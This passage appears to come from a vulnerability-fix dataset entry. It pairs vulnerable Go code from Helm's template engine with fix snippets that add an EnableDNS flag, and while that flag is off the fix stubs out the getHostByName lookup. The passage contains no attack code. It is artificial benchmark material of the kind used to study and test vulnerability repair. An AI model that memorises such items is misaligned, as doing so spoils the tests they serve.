tpl)\n\t\t}\n\n\t\ttemplates := map[string]renderable{\n\t\t\ttemplateName.(string): {\n\t\t\t\ttpl: tpl,\n\t\t\t\tvals: vals,\n\t\t\t\tbasePath: basePath.(string),\n\t\t\t},\n\t\t}\n\n\t\tresult, err := e.renderWithReferences(templates, referenceTpls)\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"error during tpl function execution for %q\", tpl)\n\t\t}\n\t\treturn result[templateName.(string)], nil\n\t}\n\n\t// Add the `required` function here so we can use lintMode\n\tfuncMap[\"required\"] = func(warn string, val interface{}) (interface{}, error) {\n\t\tif val == nil {\n\t\t\tif e.LintMode {\n\t\t\t\t// Don't fail on missing required values when linting\n\t\t\t\tlog.Printf(\"[INFO] Missing required value: %s\", warn)\n\t\t\t\treturn \"\", nil\n\t\t\t}\n\t\t\treturn val, errors.Errorf(warnWrap(warn))\n\t\t} else if _, ok := val.(string); ok {\n\t\t\tif val == \"\" {\n\t\t\t\tif e.LintMode {\n\t\t\t\t\t// Don't fail on missing required values when linting\n\t\t\t\t\tlog.Printf(\"[INFO] Missing required value: %s\", 
warn)\n\t\t\t\t\treturn \"\", nil\n\t\t\t\t}\n\t\t\t\treturn val, errors.Errorf(warnWrap(warn))\n\t\t\t}\n\t\t}\n\t\treturn val, nil\n\t}\n\n\t// Override sprig fail function for linting and wrapping message\n\tfuncMap[\"fail\"] = func(msg string) (string, error) {\n\t\tif e.LintMode {\n\t\t\t// Don't fail when linting\n\t\t\tlog.Printf(\"[INFO] Fail: %s\", msg)\n\t\t\treturn \"\", nil\n\t\t}\n\t\treturn \"\", errors.New(warnWrap(msg))\n\t}\n\n\t// If we are not linting and have a cluster connection, provide a Kubernetes-backed\n\t// implementation.\n\tif !e.LintMode && e.config != nil {\n\t\tfuncMap[\"lookup\"] = NewLookupFunction(e.config)\n\t}\n\n\tt.Funcs(funcMap)\n}"}], "fix_func": [{"id": "fix_go_49_1", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/engine/engine.go", "start_line": 37, "end_line": 54, "snippet": "type Engine struct {\n\t// If strict is enabled, template rendering will fail if a template references\n\t// a value that was not passed in.\n\tStrict bool\n\t// In LintMode, some 'required' template values may be missing, so don't fail\n\tLintMode bool\n\t// the rest config to connect to the kubernetes api\n\tconfig *rest.Config\n\t// EnableDNS tells the engine to allow DNS lookups when rendering templates\n\tEnableDNS bool\n}\n\n// New creates a new instance of Engine using the passed in rest config.\nfunc New(config *rest.Config) Engine {\n\treturn Engine{\n\t\tconfig: config,\n\t}\n}"}, {"id": "fix_go_49_2", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/engine/engine.go", "start_line": 116, "end_line": 210, "snippet": "func (e Engine) initFunMap(t *template.Template, referenceTpls map[string]renderable) {\n\tfuncMap := funcMap()\n\tincludedNames := make(map[string]int)\n\n\t// Add the 'include' function here so we can close over t.\n\tfuncMap[\"include\"] = func(name string, data interface{}) (string, error) {\n\t\tvar buf strings.Builder\n\t\tif v, ok := includedNames[name]; ok {\n\t\t\tif v > recursionMaxNums {\n\t\t\t\treturn \"\", errors.Wrapf(fmt.Errorf(\"unable to execute template\"), \"rendering template has a nested reference name: %s\", name)\n\t\t\t}\n\t\t\tincludedNames[name]++\n\t\t} else {\n\t\t\tincludedNames[name] = 1\n\t\t}\n\t\terr := t.ExecuteTemplate(&buf, name, data)\n\t\tincludedNames[name]--\n\t\treturn buf.String(), err\n\t}\n\n\t// Add the 'tpl' function here\n\tfuncMap[\"tpl\"] = func(tpl string, vals chartutil.Values) (string, error) {\n\t\tbasePath, err := vals.PathValue(\"Template.BasePath\")\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"cannot retrieve Template.Basepath from values inside tpl function: %s\", tpl)\n\t\t}\n\n\t\ttemplateName, err := vals.PathValue(\"Template.Name\")\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"cannot retrieve Template.Name from values inside tpl function: %s\", tpl)\n\t\t}\n\n\t\ttemplates := map[string]renderable{\n\t\t\ttemplateName.(string): {\n\t\t\t\ttpl: tpl,\n\t\t\t\tvals: vals,\n\t\t\t\tbasePath: basePath.(string),\n\t\t\t},\n\t\t}\n\n\t\tresult, err := e.renderWithReferences(templates, referenceTpls)\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"error during tpl function execution for %q\", tpl)\n\t\t}\n\t\treturn result[templateName.(string)], nil\n\t}\n\n\t// Add the `required` function here so we can use lintMode\n\tfuncMap[\"required\"] = func(warn string, val interface{}) (interface{}, error) {\n\t\tif val == nil {\n\t\t\tif e.LintMode {\n\t\t\t\t// Don't fail on missing required values when 
linting\n\t\t\t\tlog.Printf(\"[INFO] Missing required value: %s\", warn)\n\t\t\t\treturn \"\", nil\n\t\t\t}\n\t\t\treturn val, errors.Errorf(warnWrap(warn))\n\t\t} else if _, ok := val.(string); ok {\n\t\t\tif val == \"\" {\n\t\t\t\tif e.LintMode {\n\t\t\t\t\t// Don't fail on missing required values when linting\n\t\t\t\t\tlog.Printf(\"[INFO] Missing required value: %s\", warn)\n\t\t\t\t\treturn \"\", nil\n\t\t\t\t}\n\t\t\t\treturn val, errors.Errorf(warnWrap(warn))\n\t\t\t}\n\t\t}\n\t\treturn val, nil\n\t}\n\n\t// Override sprig fail function for linting and wrapping message\n\tfuncMap[\"fail\"] = func(msg string) (string, error) {\n\t\tif e.LintMode {\n\t\t\t// Don't fail when linting\n\t\t\tlog.Printf(\"[INFO] Fail: %s\", msg)\n\t\t\treturn \"\", nil\n\t\t}\n\t\treturn \"\", errors.New(warnWrap(msg))\n\t}\n\n\t// If we are not linting and have a cluster connection, provide a Kubernetes-backed\n\t// implementation.\n\tif !e.LintMode && e.config != nil {\n\t\tfuncMap[\"lookup\"] = NewLookupFunction(e.config)\n\t}\n\n\t// When DNS lookups are not enabled override the sprig function and return\n\t// an empty string.\n\tif !e.EnableDNS {\n\t\tfuncMap[\"getHostByName\"] = func(name string) string {\n\t\t\treturn \"\"\n\t\t}\n\t}\n\n\tt.Funcs(funcMap)\n}"}, {"id": "fix_go_49_3", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/action/upgrade.go", "start_line": 43, "end_line": 108, "snippet": "type Upgrade struct {\n\tcfg *Configuration\n\n\tChartPathOptions\n\n\t// Install is a purely informative flag that indicates whether this upgrade was done in \"install\" mode.\n\t//\n\t// Applications may use this to determine whether this Upgrade operation was done as part of a\n\t// pure upgrade (Upgrade.Install == false) or as part of an install-or-upgrade operation\n\t// (Upgrade.Install == true).\n\t//\n\t// Setting this to `true` will NOT cause `Upgrade` to perform an install if the release does not exist.\n\t// That process must be handled by creating an Install action directly. 
See cmd/upgrade.go for an\n\t// example of how this flag is used.\n\tInstall bool\n\t// Devel indicates that the operation is done in devel mode.\n\tDevel bool\n\t// Namespace is the namespace in which this operation should be performed.\n\tNamespace string\n\t// SkipCRDs skips installing CRDs when install flag is enabled during upgrade\n\tSkipCRDs bool\n\t// Timeout is the timeout for this operation\n\tTimeout time.Duration\n\t// Wait determines whether the wait operation should be performed after the upgrade is requested.\n\tWait bool\n\t// WaitForJobs determines whether the wait operation for the Jobs should be performed after the upgrade is requested.\n\tWaitForJobs bool\n\t// DisableHooks disables hook processing if set to true.\n\tDisableHooks bool\n\t// DryRun controls whether the operation is prepared, but not executed.\n\t// If `true`, the upgrade is prepared but not performed.\n\tDryRun bool\n\t// Force will, if set to `true`, ignore certain warnings and perform the upgrade anyway.\n\t//\n\t// This should be used with caution.\n\tForce bool\n\t// ResetValues will reset the values to the chart's built-ins rather than merging with existing.\n\tResetValues bool\n\t// ReuseValues will re-use the user's last supplied values.\n\tReuseValues bool\n\t// Recreate will (if true) recreate pods after a rollback.\n\tRecreate bool\n\t// MaxHistory limits the maximum number of revisions saved per release\n\tMaxHistory int\n\t// Atomic, if true, will roll back on failure.\n\tAtomic bool\n\t// CleanupOnFail will, if true, cause the upgrade to delete newly-created resources on a failed update.\n\tCleanupOnFail bool\n\t// SubNotes determines whether sub-notes are rendered in the chart.\n\tSubNotes bool\n\t// Description is the description of this operation\n\tDescription string\n\t// PostRender is an optional post-renderer\n\t//\n\t// If this is non-nil, then after templates are rendered, they will be sent to the\n\t// post renderer before sending to the Kubernetes API server.\n\tPostRenderer postrender.PostRenderer\n\t// DisableOpenAPIValidation controls whether OpenAPI validation is enforced.\n\tDisableOpenAPIValidation bool\n\t// Get missing dependencies\n\tDependencyUpdate bool\n\t// Lock to control raceconditions when the process receives a SIGTERM\n\tLock sync.Mutex\n\t// Enable DNS lookups when rendering templates\n\tEnableDNS bool\n}"}, {"id": "fix_go_49_4", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/action/upgrade.go", "start_line": 169, "end_line": 263, "snippet": "func (u *Upgrade) prepareUpgrade(name string, chart *chart.Chart, vals map[string]interface{}) (*release.Release, *release.Release, error) {\n\tif chart == nil {\n\t\treturn nil, nil, errMissingChart\n\t}\n\n\t// finds the last non-deleted release with the given name\n\tlastRelease, err := u.cfg.Releases.Last(name)\n\tif err != nil {\n\t\t// to keep existing behavior of returning the \"%q has no deployed releases\" error when an existing release does not exist\n\t\tif errors.Is(err, driver.ErrReleaseNotFound) {\n\t\t\treturn nil, nil, driver.NewErrNoDeployedReleases(name)\n\t\t}\n\t\treturn nil, nil, err\n\t}\n\n\t// Concurrent `helm upgrade`s will either fail here with `errPending` or when creating the release with \"already exists\". 
This should act as a pessimistic lock.\n\tif lastRelease.Info.Status.IsPending() {\n\t\treturn nil, nil, errPending\n\t}\n\n\tvar currentRelease *release.Release\n\tif lastRelease.Info.Status == release.StatusDeployed {\n\t\t// no need to retrieve the last deployed release from storage as the last release is deployed\n\t\tcurrentRelease = lastRelease\n\t} else {\n\t\t// finds the deployed release with the given name\n\t\tcurrentRelease, err = u.cfg.Releases.Deployed(name)\n\t\tif err != nil {\n\t\t\tif errors.Is(err, driver.ErrNoDeployedReleases) &&\n\t\t\t\t(lastRelease.Info.Status == release.StatusFailed || lastRelease.Info.Status == release.StatusSuperseded) {\n\t\t\t\tcurrentRelease = lastRelease\n\t\t\t} else {\n\t\t\t\treturn nil, nil, err\n\t\t\t}\n\t\t}\n\t}\n\n\t// determine if values will be reused\n\tvals, err = u.reuseValues(chart, currentRelease, vals)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tif err := chartutil.ProcessDependencies(chart, vals); err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\t// Increment revision count. This is passed to templates, and also stored on\n\t// the release object.\n\trevision := lastRelease.Version + 1\n\n\toptions := chartutil.ReleaseOptions{\n\t\tName: name,\n\t\tNamespace: currentRelease.Namespace,\n\t\tRevision: revision,\n\t\tIsUpgrade: true,\n\t}\n\n\tcaps, err := u.cfg.getCapabilities()\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tvaluesToRender, err := chartutil.ToRenderValues(chart, vals, options, caps)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\thooks, manifestDoc, notesTxt, err := u.cfg.renderResources(chart, valuesToRender, \"\", \"\", u.SubNotes, false, false, u.PostRenderer, u.DryRun, u.EnableDNS)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\t// Store an upgraded release.\n\tupgradedRelease := &release.Release{\n\t\tName: name,\n\t\tNamespace: currentRelease.Namespace,\n\t\tChart: chart,\n\t\tConfig: vals,\n\t\tInfo: &release.Info{\n\t\t\tFirstDeployed: currentRelease.Info.FirstDeployed,\n\t\t\tLastDeployed: Timestamper(),\n\t\t\tStatus: release.StatusPendingUpgrade,\n\t\t\tDescription: \"Preparing upgrade\", // This should be overwritten later.\n\t\t},\n\t\tVersion: revision,\n\t\tManifest: manifestDoc.String(),\n\t\tHooks: hooks,\n\t}\n\n\tif len(notesTxt) > 0 {\n\t\tupgradedRelease.Info.Notes = notesTxt\n\t}\n\terr = validateManifest(u.cfg.KubeClient, manifestDoc.Bytes(), !u.DisableOpenAPIValidation)\n\treturn currentRelease, upgradedRelease, err\n}"}, {"id": "fix_go_49_5", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/action/install.go", "start_line": 66, "end_line": 108, "snippet": "type Install struct {\n\tcfg *Configuration\n\n\tChartPathOptions\n\n\tClientOnly bool\n\tForce bool\n\tCreateNamespace bool\n\tDryRun bool\n\tDisableHooks bool\n\tReplace bool\n\tWait bool\n\tWaitForJobs bool\n\tDevel bool\n\tDependencyUpdate bool\n\tTimeout time.Duration\n\tNamespace string\n\tReleaseName string\n\tGenerateName bool\n\tNameTemplate string\n\tDescription string\n\tOutputDir string\n\tAtomic bool\n\tSkipCRDs bool\n\tSubNotes bool\n\tDisableOpenAPIValidation bool\n\tIncludeCRDs bool\n\t// KubeVersion allows specifying a custom kubernetes version to use and\n\t// APIVersions allows a manual set of supported API Versions to be passed\n\t// (for things like templating). These are ignored if ClientOnly is false\n\tKubeVersion *chartutil.KubeVersion\n\tAPIVersions chartutil.VersionSet\n\t// Used by helm template to render charts with .Release.IsUpgrade. 
Ignored if Dry-Run is false\n\tIsUpgrade bool\n\t// Enable DNS lookups when rendering templates\n\tEnableDNS bool\n\t// Used by helm template to add the release as part of OutputDir path\n\t// OutputDir/\n\tUseReleaseName bool\n\tPostRenderer postrender.PostRenderer\n\t// Lock to control raceconditions when the process receives a SIGTERM\n\tLock sync.Mutex\n}"}, {"id": "fix_go_49_6", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/action/install.go", "start_line": 192, "end_line": 357, "snippet": "func (i *Install) RunWithContext(ctx context.Context, chrt *chart.Chart, vals map[string]interface{}) (*release.Release, error) {\n\t// Check reachability of cluster unless in client-only mode (e.g. `helm template` without `--validate`)\n\tif !i.ClientOnly {\n\t\tif err := i.cfg.KubeClient.IsReachable(); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif err := i.availableName(); err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err := chartutil.ProcessDependencies(chrt, vals); err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Pre-install anything in the crd/ directory. We do this before Helm\n\t// contacts the upstream server and builds the capabilities object.\n\tif crds := chrt.CRDObjects(); !i.ClientOnly && !i.SkipCRDs && len(crds) > 0 {\n\t\t// On dry run, bail here\n\t\tif i.DryRun {\n\t\t\ti.cfg.Log(\"WARNING: This chart or one of its subcharts contains CRDs. Rendering may fail or contain inaccuracies.\")\n\t\t} else if err := i.installCRDs(crds); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif i.ClientOnly {\n\t\t// Add mock objects in here so it doesn't use Kube API server\n\t\t// NOTE(bacongobbler): used for `helm template`\n\t\ti.cfg.Capabilities = chartutil.DefaultCapabilities.Copy()\n\t\tif i.KubeVersion != nil {\n\t\t\ti.cfg.Capabilities.KubeVersion = *i.KubeVersion\n\t\t}\n\t\ti.cfg.Capabilities.APIVersions = append(i.cfg.Capabilities.APIVersions, i.APIVersions...)\n\t\ti.cfg.KubeClient = &kubefake.PrintingKubeClient{Out: ioutil.Discard}\n\n\t\tmem := driver.NewMemory()\n\t\tmem.SetNamespace(i.Namespace)\n\t\ti.cfg.Releases = storage.Init(mem)\n\t} else if !i.ClientOnly && len(i.APIVersions) > 0 {\n\t\ti.cfg.Log(\"API Version list given outside of client only mode, this list will be ignored\")\n\t}\n\n\t// Make sure if Atomic is set, that wait is set as well. 
This makes it so\n\t// the user doesn't have to specify both\n\ti.Wait = i.Wait || i.Atomic\n\n\tcaps, err := i.cfg.getCapabilities()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// special case for helm template --is-upgrade\n\tisUpgrade := i.IsUpgrade && i.DryRun\n\toptions := chartutil.ReleaseOptions{\n\t\tName: i.ReleaseName,\n\t\tNamespace: i.Namespace,\n\t\tRevision: 1,\n\t\tIsInstall: !isUpgrade,\n\t\tIsUpgrade: isUpgrade,\n\t}\n\tvaluesToRender, err := chartutil.ToRenderValues(chrt, vals, options, caps)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\trel := i.createRelease(chrt, vals)\n\n\tvar manifestDoc *bytes.Buffer\n\trel.Hooks, manifestDoc, rel.Info.Notes, err = i.cfg.renderResources(chrt, valuesToRender, i.ReleaseName, i.OutputDir, i.SubNotes, i.UseReleaseName, i.IncludeCRDs, i.PostRenderer, i.DryRun, i.EnableDNS)\n\t// Even for errors, attach this if available\n\tif manifestDoc != nil {\n\t\trel.Manifest = manifestDoc.String()\n\t}\n\t// Check error from render\n\tif err != nil {\n\t\trel.SetStatus(release.StatusFailed, fmt.Sprintf(\"failed to render resource: %s\", err.Error()))\n\t\t// Return a release with partial data so that the client can show debugging information.\n\t\treturn rel, err\n\t}\n\n\t// Mark this release as in-progress\n\trel.SetStatus(release.StatusPendingInstall, \"Initial install underway\")\n\n\tvar toBeAdopted kube.ResourceList\n\tresources, err := i.cfg.KubeClient.Build(bytes.NewBufferString(rel.Manifest), !i.DisableOpenAPIValidation)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"unable to build kubernetes objects from release manifest\")\n\t}\n\n\t// It is safe to use \"force\" here because these are resources currently rendered by the chart.\n\terr = resources.Visit(setMetadataVisitor(rel.Name, rel.Namespace, true))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Install requires an extra validation step of checking that resources\n\t// don't already exist before we actually create resources. If we continue\n\t// forward and create the release object with resources that already exist,\n\t// we'll end up in a state where we will delete those resources upon\n\t// deleting the release because the manifest will be pointing at that\n\t// resource\n\tif !i.ClientOnly && !isUpgrade && len(resources) > 0 {\n\t\ttoBeAdopted, err = existingResourceConflict(resources, rel.Name, rel.Namespace)\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrap(err, \"rendered manifests contain a resource that already exists. 
Unable to continue with install\")\n\t\t}\n\t}\n\n\t// Bail out here if it is a dry run\n\tif i.DryRun {\n\t\trel.Info.Description = \"Dry run complete\"\n\t\treturn rel, nil\n\t}\n\n\tif i.CreateNamespace {\n\t\tns := &v1.Namespace{\n\t\t\tTypeMeta: metav1.TypeMeta{\n\t\t\t\tAPIVersion: \"v1\",\n\t\t\t\tKind: \"Namespace\",\n\t\t\t},\n\t\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\t\tName: i.Namespace,\n\t\t\t\tLabels: map[string]string{\n\t\t\t\t\t\"name\": i.Namespace,\n\t\t\t\t},\n\t\t\t},\n\t\t}\n\t\tbuf, err := yaml.Marshal(ns)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresourceList, err := i.cfg.KubeClient.Build(bytes.NewBuffer(buf), true)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif _, err := i.cfg.KubeClient.Create(resourceList); err != nil && !apierrors.IsAlreadyExists(err) {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\t// If Replace is true, we need to supercede the last release.\n\tif i.Replace {\n\t\tif err := i.replaceRelease(rel); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\t// Store the release in history before continuing (new in Helm 3). We always know\n\t// that this is a create operation.\n\tif err := i.cfg.Releases.Create(rel); err != nil {\n\t\t// We could try to recover gracefully here, but since nothing has been installed\n\t\t// yet, this is probably safer than trying to continue when we know storage is\n\t\t// not working.\n\t\treturn rel, err\n\t}\n\trChan := make(chan resultMessage)\n\tdoneChan := make(chan struct{})\n\tdefer close(doneChan)\n\tgo i.performInstall(rChan, rel, toBeAdopted, resources)\n\tgo i.handleContext(ctx, rChan, doneChan, rel)\n\tresult := <-rChan\n\t//start preformInstall go routine\n\treturn result.r, result.e\n}"}, {"id": "fix_go_49_7", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/action/action.go", "start_line": 106, "end_line": 231, "snippet": "func (cfg *Configuration) renderResources(ch *chart.Chart, values chartutil.Values, releaseName, outputDir string, subNotes, useReleaseName, includeCrds bool, pr postrender.PostRenderer, dryRun, enableDNS bool) ([]*release.Hook, *bytes.Buffer, string, error) {\n\ths := []*release.Hook{}\n\tb := bytes.NewBuffer(nil)\n\n\tcaps, err := cfg.getCapabilities()\n\tif err != nil {\n\t\treturn hs, b, \"\", err\n\t}\n\n\tif ch.Metadata.KubeVersion != \"\" {\n\t\tif !chartutil.IsCompatibleRange(ch.Metadata.KubeVersion, caps.KubeVersion.String()) {\n\t\t\treturn hs, b, \"\", errors.Errorf(\"chart requires kubeVersion: %s which is incompatible with Kubernetes %s\", ch.Metadata.KubeVersion, caps.KubeVersion.String())\n\t\t}\n\t}\n\n\tvar files map[string]string\n\tvar err2 error\n\n\t// A `helm template` or `helm install --dry-run` should not talk to the remote cluster.\n\t// It will break in interesting and exotic ways because other data (e.g. discovery)\n\t// is mocked. It is not up to the template author to decide when the user wants to\n\t// connect to the cluster. 
So when the user says to dry run, respect the user's\n\t// wishes and do not connect to the cluster.\n\tif !dryRun && cfg.RESTClientGetter != nil {\n\t\trestConfig, err := cfg.RESTClientGetter.ToRESTConfig()\n\t\tif err != nil {\n\t\t\treturn hs, b, \"\", err\n\t\t}\n\t\te := engine.New(restConfig)\n\t\te.EnableDNS = enableDNS\n\t\tfiles, err2 = e.Render(ch, values)\n\t} else {\n\t\tvar e engine.Engine\n\t\te.EnableDNS = enableDNS\n\t\tfiles, err2 = e.Render(ch, values)\n\t}\n\n\tif err2 != nil {\n\t\treturn hs, b, \"\", err2\n\t}\n\n\t// NOTES.txt gets rendered like all the other files, but because it's not a hook nor a resource,\n\t// pull it out of here into a separate file so that we can actually use the output of the rendered\n\t// text file. We have to spin through this map because the file contains path information, so we\n\t// look for terminating NOTES.txt. We also remove it from the files so that we don't have to skip\n\t// it in the sortHooks.\n\tvar notesBuffer bytes.Buffer\n\tfor k, v := range files {\n\t\tif strings.HasSuffix(k, notesFileSuffix) {\n\t\t\tif subNotes || (k == path.Join(ch.Name(), \"templates\", notesFileSuffix)) {\n\t\t\t\t// If buffer contains data, add newline before adding more\n\t\t\t\tif notesBuffer.Len() > 0 {\n\t\t\t\t\tnotesBuffer.WriteString(\"\\n\")\n\t\t\t\t}\n\t\t\t\tnotesBuffer.WriteString(v)\n\t\t\t}\n\t\t\tdelete(files, k)\n\t\t}\n\t}\n\tnotes := notesBuffer.String()\n\n\t// Sort hooks, manifests, and partials. Only hooks and manifests are returned,\n\t// as partials are not used after renderer.Render. Empty manifests are also\n\t// removed here.\n\ths, manifests, err := releaseutil.SortManifests(files, caps.APIVersions, releaseutil.InstallOrder)\n\tif err != nil {\n\t\t// By catching parse errors here, we can prevent bogus releases from going\n\t\t// to Kubernetes.\n\t\t//\n\t\t// We return the files as a big blob of data to help the user debug parser\n\t\t// errors.\n\t\tfor name, content := range files {\n\t\t\tif strings.TrimSpace(content) == \"\" {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", name, content)\n\t\t}\n\t\treturn hs, b, \"\", err\n\t}\n\n\t// Aggregate all valid manifests into one big doc.\n\tfileWritten := make(map[string]bool)\n\n\tif includeCrds {\n\t\tfor _, crd := range ch.CRDObjects() {\n\t\t\tif outputDir == \"\" {\n\t\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", crd.Name, string(crd.File.Data[:]))\n\t\t\t} else {\n\t\t\t\terr = writeToFile(outputDir, crd.Filename, string(crd.File.Data[:]), fileWritten[crd.Name])\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn hs, b, \"\", err\n\t\t\t\t}\n\t\t\t\tfileWritten[crd.Name] = true\n\t\t\t}\n\t\t}\n\t}\n\n\tfor _, m := range manifests {\n\t\tif outputDir == \"\" {\n\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", m.Name, m.Content)\n\t\t} else {\n\t\t\tnewDir := outputDir\n\t\t\tif useReleaseName {\n\t\t\t\tnewDir = filepath.Join(outputDir, releaseName)\n\t\t\t}\n\t\t\t// NOTE: We do not have to worry about the post-renderer because\n\t\t\t// output dir is only used by `helm template`. 
In the next major\n\t\t\t// release, we should move this logic to template only as it is not\n\t\t\t// used by install or upgrade\n\t\t\terr = writeToFile(newDir, m.Name, m.Content, fileWritten[m.Name])\n\t\t\tif err != nil {\n\t\t\t\treturn hs, b, \"\", err\n\t\t\t}\n\t\t\tfileWritten[m.Name] = true\n\t\t}\n\t}\n\n\tif pr != nil {\n\t\tb, err = pr.Run(b)\n\t\tif err != nil {\n\t\t\treturn hs, b, notes, errors.Wrap(err, \"error while running post render on files\")\n\t\t}\n\t}\n\n\treturn hs, b, notes, nil\n}"}, {"id": "fix_go_49_8", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "cmd/helm/upgrade.go", "start_line": 70, "end_line": 254, "snippet": "func newUpgradeCmd(cfg *action.Configuration, out io.Writer) *cobra.Command {\n\tclient := action.NewUpgrade(cfg)\n\tvalueOpts := &values.Options{}\n\tvar outfmt output.Format\n\tvar createNamespace bool\n\n\tcmd := &cobra.Command{\n\t\tUse: \"upgrade [RELEASE] [CHART]\",\n\t\tShort: \"upgrade a release\",\n\t\tLong: upgradeDesc,\n\t\tArgs: require.ExactArgs(2),\n\t\tValidArgsFunction: func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n\t\t\tif len(args) == 0 {\n\t\t\t\treturn compListReleases(toComplete, args, cfg)\n\t\t\t}\n\t\t\tif len(args) == 1 {\n\t\t\t\treturn compListCharts(toComplete, true)\n\t\t\t}\n\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n\t\t},\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tclient.Namespace = settings.Namespace()\n\n\t\t\t// Fixes #7002 - Support reading values from STDIN for `upgrade` command\n\t\t\t// Must load values AFTER determining if we have to call install so that values loaded from stdin are are not read twice\n\t\t\tif client.Install {\n\t\t\t\t// If a release does not exist, install it.\n\t\t\t\thistClient := action.NewHistory(cfg)\n\t\t\t\thistClient.Max = 1\n\t\t\t\tif _, err := histClient.Run(args[0]); err == driver.ErrReleaseNotFound {\n\t\t\t\t\t// Only print this to stdout for table output\n\t\t\t\t\tif outfmt == output.Table {\n\t\t\t\t\t\tfmt.Fprintf(out, \"Release %q does not exist. 
Installing it now.\\n\", args[0])\n\t\t\t\t\t}\n\t\t\t\t\tinstClient := action.NewInstall(cfg)\n\t\t\t\t\tinstClient.CreateNamespace = createNamespace\n\t\t\t\t\tinstClient.ChartPathOptions = client.ChartPathOptions\n\t\t\t\t\tinstClient.Force = client.Force\n\t\t\t\t\tinstClient.DryRun = client.DryRun\n\t\t\t\t\tinstClient.DisableHooks = client.DisableHooks\n\t\t\t\t\tinstClient.SkipCRDs = client.SkipCRDs\n\t\t\t\t\tinstClient.Timeout = client.Timeout\n\t\t\t\t\tinstClient.Wait = client.Wait\n\t\t\t\t\tinstClient.WaitForJobs = client.WaitForJobs\n\t\t\t\t\tinstClient.Devel = client.Devel\n\t\t\t\t\tinstClient.Namespace = client.Namespace\n\t\t\t\t\tinstClient.Atomic = client.Atomic\n\t\t\t\t\tinstClient.PostRenderer = client.PostRenderer\n\t\t\t\t\tinstClient.DisableOpenAPIValidation = client.DisableOpenAPIValidation\n\t\t\t\t\tinstClient.SubNotes = client.SubNotes\n\t\t\t\t\tinstClient.Description = client.Description\n\t\t\t\t\tinstClient.DependencyUpdate = client.DependencyUpdate\n\t\t\t\t\tinstClient.EnableDNS = client.EnableDNS\n\n\t\t\t\t\trel, err := runInstall(args, instClient, valueOpts, out)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\treturn outfmt.Write(out, &statusPrinter{rel, settings.Debug, false, false})\n\t\t\t\t} else if err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif client.Version == \"\" && client.Devel {\n\t\t\t\tdebug(\"setting version to >0.0.0-0\")\n\t\t\t\tclient.Version = \">0.0.0-0\"\n\t\t\t}\n\n\t\t\tchartPath, err := client.ChartPathOptions.LocateChart(args[1], settings)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tp := getter.All(settings)\n\t\t\tvals, err := valueOpts.MergeValues(p)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Check chart dependencies to make sure all are present in /charts\n\t\t\tch, err := loader.Load(chartPath)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif req := ch.Metadata.Dependencies; req != nil {\n\t\t\t\tif err := action.CheckDependencies(ch, req); err != nil {\n\t\t\t\t\terr = errors.Wrap(err, \"An error occurred while checking for chart dependencies. 
